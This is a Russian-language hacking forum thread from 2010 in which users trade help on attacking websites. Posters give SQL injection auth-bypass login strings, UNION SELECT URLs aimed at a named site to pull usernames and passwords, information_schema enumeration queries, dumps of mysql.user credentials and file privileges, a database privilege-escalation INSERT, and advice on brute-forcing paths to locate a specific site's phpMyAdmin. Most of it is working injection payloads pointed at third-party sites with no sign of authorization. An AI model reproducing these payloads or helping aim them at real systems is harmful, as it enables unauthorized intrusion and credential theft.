Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Столько ошибок в одной строчке :) не в обиду, но больше читай мануалы, это совет :)

    user_privileges брать в кавычки не нужно, это ж табличка. UPDATE нужно взять в такие кавычки, чтобы он не определялся как оператор. Там где tracker и localhost нужно отслешировать кавычки, чтобы они не рвали запрос.
    INSERT INTO USER_PRIVILEGES VALUES('tracker\'@\'localhost',null, `UPDATE`,YES)
     
    #11121 v1d0qz, 19 Jan 2010
    Last edited: 19 Jan 2010
    1 person likes this.
  2. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    А каким еще способом можно увеличить привилегии юзера бд.
    Система фрибсд 7.2.
     
  3. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Возможен auth bypass,не фильтруються переменные логина и пароля....
    Я не смотрел,но может поможет в дальнейшем.
    ЗЫ:login -
    ' or 1=1/*
    admin'/*

     
    #11123 S00pY, 20 Jan 2010
    Last edited: 20 Jan 2010
    2 people like this.
  4. GinTonic

    GinTonic New Member

    Joined:
    18 Dec 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    1
    что за инъекция:...
    подставляя кавычку
    вылетает ошибка
    После подбирая количество полей нахожу нужное количество. Но принтабельного поля нет...
    что это такое?
     
  5. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
     
  6. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Брутить пути и субдомены =)
    Если phpmyadmin там есть вообще...
    billing.centre.ru это не пойдет?
     
  7. Ugol

    Ugol Banned

    Joined:
    26 Dec 2009
    Messages:
    195
    Likes Received:
    2
    Reputations:
    0
    Посмотри в (субдоменны ))
     
  8. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    GinTonic,

    http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users--+
     
    2 people like this.
  9. GinTonic

    GinTonic New Member

    Joined:
    18 Dec 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    1
    а почему ноль на двойку заменил?
    и почему в 3 и 12?
     
    #11129 GinTonic, 20 Jan 2010
    Last edited: 20 Jan 2010
  10. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    смотри внимательней
     
  11. Alf0x0ns

    Alf0x0ns Member

    Joined:
    12 Jan 2010
    Messages:
    14
    Likes Received:
    5
    Reputations:
    1
    Для GinTonic:
    1. Думаю для автора скули лутше так будет):
    Code:
    http://www.aaadtc.com/page.php?content=buy&cnum=-21+union+all+select+1,2,password,4,5,6,7,8,9,10,11,username,13,14+from+users--
    2. Если убрать password и поставить 3 или 35656 то ты увидишь как сайт выведет эти числа, можно заменять любое число которое выводица на сайте при скуле, а уже пассворд и юсернаме это часть(столбцы) таблицы юсер для их вывода ты должен их знать!

    Читай статьи на форуме))):
    Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд
    SQL инъекция (в т.ч. и blind SQL)
    Примеры:
    Sql Инъекции
     
    #11131 Alf0x0ns, 20 Jan 2010
    Last edited: 20 Jan 2010
  12. GinTonic

    GinTonic New Member

    Joined:
    18 Dec 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    1
    а для чего там all нужен?
     
  13. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    такой инъекшн, помогите раскрутить..
    так все выводить, базу:таблицу:столбец
    Code:
    -133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x75736572+LIMIT+0,1+--+
    пытаюсь посмотреть данные, но ничего нет, тоесть вообще пусто, даже пропадают цифры, в принтабельных полях
    Code:
    -133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,USERID,USERNAME,USERPASSWORD),6,7,8,9,10+FROM+basename.user+LIMIT+0,1+--+
    но ведь должны быть какие-то данные, я пробовал в других таблицах смотреть, но тоже самое, не выводит ничего. Может что не так делаю? Или все таки пустые таблицы?
    зы Не хотелось бы светить сайт, может кто по асикю подскажет?

    зыы и еще может кто нить подскажет, что можно почитать по скулям через куки, а то ничего толком найти не могу ((
     
    #11133 Gidz, 21 Jan 2010
    Last edited: 21 Jan 2010
  14. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    тест пустая табла или нет
    ;)
     
  15. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?
     
  16. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    file_priv
     
  17. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    0
    Likes Received:
    4
    Reputations:
    1
    site.com/new.php?id=-1+union+select+1,file_priv,3--
    так да?
    щас просто попробывал на пару сайтов ошибка вылазит =/
     
  18. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    выводит привилегии на доступ у юзеров.
    site.com/new.php?id=-1+union+select+1,concat_ws(0x3a,user,password,file_priv),3+from+mysql.user--
     
    2 people like this.
  19. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    site.com/new.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where+user='[B]username[/B]'/*
    * где username - имя юзера под которым работает база.
     
    #11139 RulleR, 21 Jan 2010
    Last edited: 21 Jan 2010
    2 people like this.
  20. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    0 я так понял означает что таблица пуста? :(
     
Thread Status:
Not open for further replies.